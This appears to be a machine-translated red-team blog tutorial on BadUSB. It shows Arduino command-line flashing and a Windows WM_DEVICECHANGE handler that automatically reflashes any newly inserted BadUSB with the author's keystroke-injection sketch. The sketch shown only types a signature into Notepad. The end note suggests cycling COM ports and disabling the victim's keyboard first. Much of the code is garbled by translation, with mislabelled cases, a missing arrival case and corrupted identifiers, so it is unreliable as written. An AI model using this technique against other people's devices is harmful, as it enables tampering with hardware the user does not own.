preface

With the increasingly fierce red-blue confrontation, the red team’s attack point from the original Web method also involves many directions, such as hardware attack.

The most obvious hardware attack is Badusb. Speaking of this thing. I think we all know that a lot of online production articles.

【 View learning materials 】

Another kind of burning BadUsb

There are indeed most BadUsb burning methods on the Internet, but they are based on Arduino interface burning, but after my own research

Arduino can also be burned through command line parameters, as follows:

C:\Users\Administrator\Desktop\Arduino\ Arduino_debug. exe --port COM port --upload Burned content fileCopy the code

For the file path, you can see the following figure. When saving the content, detailed information is given with the suffix ino. After the author’s command line compilation test, the path should be:

C:\xxx\sketch_apr01a\sketch_apr01a.ino
Copy the code

Sketch_apr01a is the project file, and at the top there is also a directory with the name Sketch_APr01A

Code analysis process

In Windows SDK development, any window can receive messages and respond to them. In the same way, when BadUSB or USB flash drive is inserted or removed, there will be corresponding messages and responses.

The message used is: WM_DEVICECHANGE

(Notifies the application of changes to the hardware configuration of the device or computer, receiving messages through WindowProc functions)

The function prototype is as follows:

LRESULT CALLBACK WindowProc ( HWND hWnd, 
                              UINT message,
                                WPARAM wParam, 
                                LParam);
Copy the code

The third argument in WindowProc, wParam, points to the event that occurred and looks for that value in the dbt.h header. Let’s talk about the macros we’ll use in dbt.h:

DBT_DEVICEARRIVAL // Responds when the device is inserted DBT_DEVICEREMOVECOMPLETE // responds when the device is pulled outCopy the code

Code implements the message response

Let’s start with the WndProc function. The implementation is a case for message response

Add your own message response, the following code when BadUSB is inserted, will pop up to show the device is inserted.

Case WM_DEVICECHANGE:// Capture device change message switch (wParam){case DBT_DEVICEARRIVAL:// capture device insert MessageBoxA(NULL, "device insert ", "test", NULL); break; Case DBT_DEVICEREMOVECOMPLETE:// Capture device popup MessageBoxA(NULL, "Device unplugged ", "test", NULL); break; }Copy the code

Here, when I insert BadUSB, the message is successfully captured and pop-ups.

Core code implementation

Since BadUSB responds to the message function when it is inserted, let the message function execute the Arduino command line and auto-burn. When the Red team later makes changes to BadUSB, it executes the code we burned

BadUSB will burn as follows, with the setup function as the initialization function. When BadUSB is inserted, open Notepad and type By: Met32. This can be changed by yourself.. I’ll just write it that way for the sake of demonstration.

void setup() { // put your setup code here, to run once: Keyboard.begin(); // Start keyboard communication delay(1000); Keyboard. Press (KEY_CAPS_LOCK); // Hit the uppercase key so we'd better write it like this otherwise most computers will have a problem with Keyboard. Release (KEY_CAPS_LOCK); Delay (500); Keyboard.press(KEY_LEFT_GUI); // Press the win key delay(500); Keyboard.press('r'); // Press r delay(500); Keyboard.release(KEY_LEFT_GUI); // Release keyboard. release('r'); Delay (500); Keyboard.println("notepad"); // Enter notepad to open notepad delay(500); Keyboard.press(KEY_RETURN); // Press the return key keyboard.release (KEY_RETURN); // Release enter key delay(500); The rid_device_info_keyboard. Println (" By: Met32 "); // Enter the information we want to display Keyboard. Press (KEY_RETURN); // Press the return key keyboard.release (KEY_RETURN); // Release enter key delay(500); Keyboard.press(KEY_CAPS_LOCK); // Press the uppercase key keyboard. release(KEY_CAPS_LOCK); Delay (500); delay(500); Keyboard.end(); } void loop() {// Put your main code here, to run:}Copy the code

The WndProc code is as follows.

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { int wmId, wmEvent; PAINTSTRUCT ps; HDC hdc; switch (message) { case WM_COMMAND: wmId = LOWORD(wParam); wmEvent = HIWORD(wParam); Switch (wmId) {case IDM_ABOUT: DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About); break; case IDM_EXIT: DestroyWindow(hWnd); break; default: return DefWindowProc(hWnd, message, wParam, lParam); } break; case WM_PAINT: hdc = BeginPaint(hWnd, &ps); // TODO: Add any drawing code here... EndPaint(hWnd, &ps); break; case WM_DESTROY: PostQuitMessage(0); break; Case WM_DEVICECHANGE: switch (wParam){ system("C:\Users\Arduino\arduino_debug.exe --port COM5 --upload C:\Users\Administrator\Desktop\sketch_apr01a\sketch_apr02a\sketch_apr02a.ino"); break; Case DBT_DEVICEREMOVECOMPLETE: MessageBoxA(NULL, "Device unplugged ", "test", NULL); break; } break; default: return DefWindowProc(hWnd, message, wParam, lParam); } return 0; }Copy the code

Use process

Now to see the effect, when BadUSB is inserted, copy the burned content to each other’s BadUSB.

After the program exit, BadUSB new insert, successful display, prove that we successfully burned to each other’s BadUSB

End note

There is no need to worry about the Arduino path, because they are all written on their own machine. The problem lies in the COM port. After BadUSB is inserted, we are not sure which port to use. Therefore, you can execute all common COM port numbers in one loop.

If you want to be more thorough, you can check to disable the keyboard after BadUSB is inserted and then execute our system command.

The last

Click to viewNetwork security learning materials · Walkthrough】